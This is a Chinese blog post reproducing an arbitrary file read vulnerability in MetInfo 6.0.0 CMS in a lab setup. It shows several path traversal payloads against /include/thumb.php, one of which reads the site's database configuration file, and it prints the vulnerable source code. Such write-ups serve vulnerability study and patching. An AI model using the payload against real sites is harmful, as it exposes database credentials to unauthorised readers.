metinfo 6.0.0 任意文件读取漏洞复现

已于 2023-11-20 11:44:39 修改
阅读量101 收藏
点赞数
文章标签: 安全
于 2023-11-14 15:12:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_wjyjw/article/details/134399374
版权

漏洞描述

        MetInfo 6.0.0 版本中的C:\phpstudy_2016\WWW\metinfo_6.0.0\app\system\include\module\old_thumb.class.php  文件存在任意文件读取漏洞,攻击者可利用漏洞读取网站上的敏感文件。

漏洞等级

高危

漏洞复现

基本环境
组件版本
OSMicrosoft Windows Server 2016 Standard
Web ServerphpStudy 2016
MetInfo

6.0.0

漏洞点

/include/thumb.php

第一次测试:

/include/thumb.php?dir=..././http/..././config/config_db.php

读取失败

第二次测试:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

读取失败

测试:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

读取失败

第四次测试:

/include/thumb.php?dir=http\..\..\config\config_db.php

读取成功

EXP编写

<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
defined('IN_MET') or exit('No permission');
load::sys_class('web');
class old_thumb extends web{
      public function doshow(){
        global $_M;
         $dir = str_replace(array('../','./'), '', $_GET['dir']);
        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }
        if($_M['form']['pageset']){
          $path = $dir."&met-table={$_M['form']['met-table']}&met-field={$_M['form']['met-field']}";
        }else{
          $path = $dir;
        }
        $image =  thumb($path,$_M['form']['x'],$_M['form']['y']);
        if($_M['form']['pageset']){
          $img = explode('?', $image);
          $img = $img[0];
        }else{
          $img = $image;
        }
        if($img){
            header("Content-type: image/jpeg");
            ob_start();
            readfile(PATH_WEB.str_replace($_M['url']['site'], '', $img));
            ob_flush();
            flush();
        }
    }
}
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

修复方案

打补丁、升级、上设备

西柠!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1727
进行漏洞复现读取敏感文件
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6076
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 301
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 450
metinfo文件上传、漏洞、一句话木马
MetInfo 5.3.19 变量覆盖漏洞
weixin_51681694的博客
05-04 301
MetInfo5.3.19 存在变量覆盖,导致可任意用户密码重置 见网上都没有详细的解释,我就来写一下顺便学习学习
DAMICMS&METINFO漏洞复现
Feng_Blue_的博客
10-26 2791
本文仅提供于学术探讨,如有后果自行承担。 DAMI—5.4任意商品购买漏洞 访问dami的网页 先注册用户 注册登录之后显示该页,直接选择上方的产品展示 选择框中内容 这里启动BP 对该商品进行下单操作 使用BP捕获到包 具体如下 将bp捕获到的包发送到repeater模块 找到填写数量的参数 对其进行修改 重放 提示交易成功,此时返回账户查看账户余额 订单页面也有信息 在体现页面看到账户余额位5400,这个上...
metinfo 后台sql注入1
08-03
本文将深入探讨MetInfo 6.1.0版本中的一个SQL注入漏洞,该漏洞存在于app/system/feedback/admin/feedback_admin.class.php文件的第620行。 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗...
MetInfo 企业建站系统 v5.3.16
12-01
**MetInfo 企业建站系统 v5.3.16** MetInfo 是一款专为企业建站设计的内容管理系统(CMS),其v5.3.16版本具有诸多优势,深受新手和有一定PHP基础的开发者喜爱。该系统以轻量级、易用性著称,为快速搭建专业的企业...
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo是一款功能强大的企业网站管理系统,它为企业提供了一站式的建站解决方案。在这个主题中,我们主要关注的是MetInfo的短信插件、短信接口开发以及短信发送设置的相关知识点。 一、MetInfo短信插件 MetInfo...
MetInfo模板文件结构与概况详解
08-04
本教程主要对MetInfo系统中的模板文件结构与概况进行了详细的介绍与说明。
metinfo龙达企业自适应模板
09-01
Metinfo龙达企业自适应模板深度解析》 在当今数字化时代,企业网站不仅代表着公司的形象,更是与客户沟通的重要桥梁。Metinfo是一款强大的开源企业建站系统,以其易用性、灵活性和全面的功能深受广大用户的喜爱。...
metinfov5.0.4漏洞复现
Key_book(句芒安全实验室)
06-07 3701
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用. 产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 . 下面开始漏洞复现 测试环境: ...
如何修复php网站漏洞
网站漏洞修复专家
04-08 3776
近日,我们SINE安全metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数据库,以及后端服务器进行攻击,该metinfo漏洞影响版本较为广泛,metinfo6.1.0版本,metinfo 6.1.3版本,metinfo 6.2.0都会受到该网站漏洞的攻击。 metinfo...
关于METINFO5.3漏洞引发的变量覆盖漏洞
weixin_30781775的博客
05-06 314
一.$$引起的变量覆盖漏洞, 1、Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2、$_200,$_403 定义两个参数,以及参数值。3、判断访问页面的方法是否为post方法和有没有参数flag。4、再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。5、还有一个i...
Metinfo 6.1.2 SQL注入漏洞复现
xy_sugar的博客
03-23 1274
搭建环境 ①首先搭建环境,这里用phpstudy进行环境的搭建,访问之后进行安装。 漏洞复现 ②环境搭建完成之后在kali里面执行payload,需要python环境,这块遇到的一个问题就是,直接运行payload发现出不来结果, ③经过思考和查询发现这里需要对payload里面的地址进行修改,改成搭建环境的地址。 接下来,成功运行payload ...
Web渗透-一次艰难获取后台经历-metinfo5.3.18密码重置漏洞复现
qq_45066095的博客
08-26 1070
前期准备 内部搭建环境进行了一次为期两天的演练,通过给的测试地址发现这是一个静态网页,发现URL中有参数id=某某数,心想着这就要被我挖掘出来了,我激动的手指颤抖着敲打键盘,尝试用sqlmap跑了下发现进行了拦截,最后手工尝试也没成功。然后又尝试看有没有跨站漏洞,发现对输入的数据进行了过滤。内心一下子就拔凉拔凉的,打算擦干眼泪接着整,不信挖掘不到漏洞,准备大干一场。开始扫描端口和目录,余光一扫看到吃饭点了,迅速关上电脑迈着欢快的步伐。。。。。。 挖掘漏洞 吃得饱饱的回来查看开放的端口 发现开放shh,进行
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1098
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 584
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
metinfo6.0.0文件上传
09-01
根据引用中提到的目录,在南方数据管理系统中存在文件...所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值